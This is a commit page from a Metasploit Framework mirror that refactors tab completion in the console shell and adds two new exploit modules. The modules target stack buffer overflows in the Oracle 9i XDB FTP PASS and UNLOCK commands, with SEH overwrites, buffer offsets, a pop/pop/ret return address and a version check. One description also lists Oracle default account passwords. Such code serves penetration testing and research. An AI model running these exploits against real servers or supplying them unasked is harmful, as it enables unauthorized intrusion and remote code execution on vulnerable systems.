infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Many fixes/updates/new ftp modules 

Fixed the tab completion hackery - moved from driver to dispatcher_shell


git-svn-id: file:///home/svn/incoming/trunk@3094 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-11-25 04:11:22 +00:00
parent 6c4703add7
commit cd8b9849ce
6 changed files with 201 additions and 40 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
lib/msf/ui/console/driver.rb
View File

@ -66,9 +66,7 @@ class Driver < Msf::Ui::Driver
# Process the resource script
process_rc_file
# Initialize the tab completion array
self.tab_words = []
end
#
@ -202,7 +200,6 @@ class Driver < Msf::Ui::Driver
protected
attr_writer :framework # :nodoc:
attr_accessor :tab_words # :nodoc:
##
#
@ -262,31 +259,6 @@ protected
set_log_level(Rex::LogSource, val)
set_log_level(Msf::LogSource, val)
end
#
# This method accepts the entire line of text from the Readline
# routine, stores all completed words, and passes the partial
# word to the real tab completion function. This works around
# a design problem in the Readline module and depends on the
# Readline.basic_word_break_characters variable being set to \x00
#
def tab_complete(str)
# Check trailing whitespace so we can tell 'x' from 'x '
str_match = str.match(/\s+$/)
str_trail = (str_match.nil?) ? '' : str_match[0]
# Split the line up by whitespace into words
str_words = str.split(/[\s\t\n]+/)
# Append an empty word if we had trailing whitespace
str_words << '' if str_trail.length > 0
# Place the word list into an instance variable
self.tab_words = str_words
# Pop the last word and pass it to the parent
super(self.tab_words.pop)
end
end

37
lib/rex/ui/text/dispatcher_shell.rb
View File

@ -90,14 +90,42 @@ module DispatcherShell
def initialize(prompt, prompt_char = '>')
super
# Initialze the dispatcher array
self.dispatcher_stack = []
# Initialize the tab completion array
self.tab_words = []
end
#
# Performs tab completion on shell input if supported.
# Current words can be found in self.tab_words
# This method accepts the entire line of text from the Readline
# routine, stores all completed words, and passes the partial
# word to the real tab completion function. This works around
# a design problem in the Readline module and depends on the
# Readline.basic_word_break_characters variable being set to \x00
#
def tab_complete(str)
# Check trailing whitespace so we can tell 'x' from 'x '
str_match = str.match(/\s+$/)
str_trail = (str_match.nil?) ? '' : str_match[0]
# Split the line up by whitespace into words
str_words = str.split(/[\s\t\n]+/)
# Append an empty word if we had trailing whitespace
str_words << '' if str_trail.length > 0
# Place the word list into an instance variable
self.tab_words = str_words
# Pop the last word and pass it to the real method
tab_complete_stub(self.tab_words.pop)
end
# Performs tab completion of a command, if supported
# Current words can be found in self.tab_words
#
def tab_complete_stub(str)
items = []
# puts "Words(#{tab_words.join(", ")}) Partial='#{str}'"
@ -111,10 +139,6 @@ module DispatcherShell
items.concat(dispatcher.commands.to_a.map { |x| x[0] })
end
# XXX - This should now be obsolete!
# If the dispatcher has custom tab completion items, use them
# items.concat(dispatcher.tab_complete_items || [])
# If the dispatcher exports a tab completion function, use it
if(dispatcher.respond_to?('tab_complete_helper'))
res = dispatcher.tab_complete_helper(str, tab_words)
@ -275,6 +299,7 @@ module DispatcherShell
attr_accessor :dispatcher_stack # :nodoc:
attr_accessor :tab_words # :nodoc:
end

2
modules/exploits/windows/ftp/globalscapeftp_input.rb
View File

@ -54,7 +54,7 @@ class Exploits::Windows::Ftp::GlobalScapeInputOverflow < Msf::Exploit::Remote
buf[2043, 4] = [ target.ret ].pack('V')
buf[2047, payload.encoded.length] = payload.encoded
send_cmd( [buf] , false )
send_cmd( [buf] )
disconnect
handler

7
modules/exploits/windows/ftp/netterm_netftpd_user.rb
View File

@ -1,5 +1,4 @@
require 'msf/core'
require 'msf/core/exploit/ftp'
module Msf
@ -100,8 +99,8 @@ class Exploits::Windows::Ftp::NetTermNetFTPOverflow < Msf::Exploit::Remote
buf[1, payload.encoded.length] = payload.encoded
buf[1014, 4] = [ target.ret ].pack('V')
send_cmd( ["USER #{buf}"] , true )
send_cmd( ['HELP'] , true )
send_cmd( ["USER #{buf}"] )
send_cmd( ['HELP'] )
disconnect

83
modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb Normal file
View File

@ -0,0 +1,83 @@
require 'msf/core/exploit/ftp'
module Msf
class Exploits::Windows::Ftp::Oracle9iXDPPassOverflow < Msf::Exploit::Remote
include Exploit::Remote::Ftp
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)',
'Description' => %q{
By passing an overly long string to the PASS command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conference.
},
'Author' => [ 'y0 <y0[at]w00t-shell.net>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '2449'],
[ 'BID', '8375'],
[ 'CVE', '2003-0727'],
[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
[ 'MIL', '48'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x20\x0a\x0d",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Targets' =>
[
[
'Oracle 9.2.0.1 Universal',
{
'Platform' => 'win',
'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)
},
],
],
'DisclosureDate' => 'Aug 18 2003',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /9\.2\.0\.1\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
usr = Rex::Text.rand_text_english(rand(8)+1, payload_badchars)
buf = Rex::Text.rand_text_english(1292, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[442, seh.length] = seh
send_cmd( ['USER', usr], true )
send_cmd( ['PASS', buf], false )
disconnect
handler
end
end
end

82
modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb Normal file
View File

@ -0,0 +1,82 @@
require 'msf/core/exploit/ftp'
module Msf
class Exploits::Windows::Ftp::Oracle9iXDBUnlockOverflow < Msf::Exploit::Remote
include Exploit::Remote::Ftp
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
'Description' => %q{
By passing an overly long token to the UNLOCK command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conference. Oracle9i includes a number of default accounts,
including dbsnmp:dbsmp, scott:tiger, system:manager, and
sys:change_on_install.
},
'Author' => [ 'y0 <y0@w00t-shell.net>', 'David Litchfield <david@ngssoftware.com>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '2449'],
[ 'BID', '8375'],
[ 'CVE', '2003-0727'],
[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
[ 'MIL', '47'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x20\x0a\x0d",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Targets' =>
[
[
'Oracle 9.2.0.1 Universal',
{
'Platform' => 'win',
'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)
},
],
],
'DisclosureDate' => 'Aug 18 2003',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /9\.2\.0\.1\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
print_status("Trying target #{target.name}...")
buf = Rex::Text.rand_text_english(1130, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[322, seh.length] = seh
send_cmd( ['UNLOCK', '/', buf] , false )
disconnect
handler
end
end
end